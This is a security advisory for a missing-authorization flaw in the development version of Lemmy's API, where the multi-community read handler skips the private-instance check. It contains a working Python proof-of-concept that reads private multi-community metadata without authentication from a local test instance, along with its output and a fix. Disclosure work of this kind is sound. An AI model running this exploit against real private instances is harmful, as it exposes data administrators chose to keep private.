PT-2026-41494 · Crates.Io · Lemmy Api
Published 2026-05-06 · Updated 2026-05-06
CVSS v3.1: 5.3 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
NOTE: Only affects development version.
Summary
`read_multi_community()` does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists.
Details
Other read handlers load `local_site` and call `check_private_instance()` before returning data to unauthenticated callers. `read_multi_community()` never calls that helper:
```rust
pub async fn read_multi_community(
    Query(data): Query<GetMultiCommunity>,
    context: Data<LemmyContext>,
    local_user_view: Option<LocalUserView>,
) -> LemmyResult<Json<GetMultiCommunityResponse>> {
    // No check_private_instance() call here: the private-instance setting is
    // never consulted before the identifier is resolved and the row is read.
    let my_person_id = local_user_view.as_ref().map(|l| l.person.id);
    let id = resolve_multi_community_identifier(&data.name, data.id, &context, &local_user_view)
        .await?
        .ok_or(LemmyErrorType::NoIdGiven)?;
    let multi_community_view =
        MultiCommunityView::read(&mut context.pool(), id, my_person_id).await?;
    // (rest of the handler omitted in the advisory excerpt)
}
```
`get_community()`, `list_posts()`, `list_comments()`, `read_person()`, `search()`, and `resolve_object()` all enforce the private-instance guard.
Proof of Concept
The script creates a multi-community whose metadata contains a marker, turns on `private_instance`, confirms that a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over GET /multi_community without authentication.
```python
#!/usr/bin/env python3
import json, random, string
import requests

BASE = "http://127.0.0.1:8536/api/v4"
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"


def api(method, path, token=None, **kw):
    """Send one API request; attach the bearer token when one is given."""
    h = kw.pop("headers", {})
    if token:
        h["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=h, **kw)


suffix = "multi" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
secret = "SECRET_MULTI_" + suffix
admin = api("POST", "/account/auth/login", json={"username_or_email": ADMIN_USER, "password": ADMIN_PASS}).json()["jwt"]

# Create a multi-community whose title/summary/sidebar embed the marker.
mid = api("POST", "/multi_community", admin, json={
    "name": "m" + suffix, "title": secret,
    "summary": secret + " summary", "sidebar": secret + " sidebar",
}).json()["multi_community_view"]["multi"]["id"]

# Enable private instance.
api("PUT", "/site", admin, json={"private_instance": True})
print("private_instance:", api("GET", "/site").json()["site_view"]["local_site"]["private_instance"])

# Control: a comparable read endpoint correctly rejects unauthenticated callers.
control = api("GET", "/community/list")
print("unauth /community/list (control):", control.status_code, control.text[:120])

# Leak: read_multi_community returns the private metadata to an unauthenticated caller.
leak = api("GET", "/multi_community", params={"id": mid})
print("unauth /multi_community:", leak.status_code, leak.text[:300])
print("contains secret:", secret in leak.text)
```
Output:
```text
private_instance: True
unauth /community/list (control): 400 {"error":"instance is private","cause":"InstanceIsPrivate"}
unauth /multi_community: 200 {"multi_community_view":{"multi":{"title":"SECRET_MULTI_multijwxokm","summary":"SECRET_MULTI_multijwxokm summary","sidebar":"SECRET_MULTI_multijwxokm sidebar"}}}
contains secret: True
```
The control request shows the privacy setting is active. The multi-community endpoint still returns the private metadata.
Impact
An unauthenticated visitor can read multi-community metadata from an instance whose admin configured the site as private. The exposed fields include names, titles, summaries, sidebars, owner identities, and member community lists.
Recommended Fix
Load `local_site` at the start of `read_multi_community()` and call `check_private_instance(&local_user_view, &local_site)?` before resolving or reading the multi-community.
Found by aisafe.io
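The recommended guard as a self-contained Rust model, added here as an illustration; it is not Lemmy's code, and the error variants, struct fields and in-memory store are simplified stand-ins for the real types.

```rust
// Added illustration of the recommended fix: a simplified, self-contained
// model of Lemmy's private-instance guard. The struct shapes, the error
// variants and the in-memory store are stand-ins, not Lemmy's real types.
#[derive(Debug, PartialEq)]
pub enum LemmyErrorType {
    InstanceIsPrivate,
    NoIdGiven,
    NotFound,
}

pub struct LocalSite {
    pub private_instance: bool,
}

pub struct LocalUserView {
    pub person_id: i32,
}

#[derive(Clone, Debug, PartialEq)]
pub struct MultiCommunity {
    pub id: i32,
    pub title: String,
}

/// The guard the other read handlers already apply: an anonymous caller is
/// rejected as soon as the local site is marked private.
pub fn check_private_instance(
    local_user_view: &Option<LocalUserView>,
    local_site: &LocalSite,
) -> Result<(), LemmyErrorType> {
    if local_user_view.is_none() && local_site.private_instance {
        return Err(LemmyErrorType::InstanceIsPrivate);
    }
    Ok(())
}

/// Fixed read handler: the guard runs before the identifier is resolved or any
/// multi-community row is loaded, so nothing reaches an anonymous visitor.
pub fn read_multi_community(
    id: Option<i32>,
    store: &[MultiCommunity],
    local_site: &LocalSite,
    local_user_view: &Option<LocalUserView>,
) -> Result<MultiCommunity, LemmyErrorType> {
    check_private_instance(local_user_view, local_site)?;
    let id = id.ok_or(LemmyErrorType::NoIdGiven)?;
    let found = store.iter().find(|m| m.id == id).cloned();
    found.ok_or(LemmyErrorType::NotFound)
}
```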
Fix
Missing Authorization
Weakness Enumeration
Related identifiers
Affected products
Lemmy Api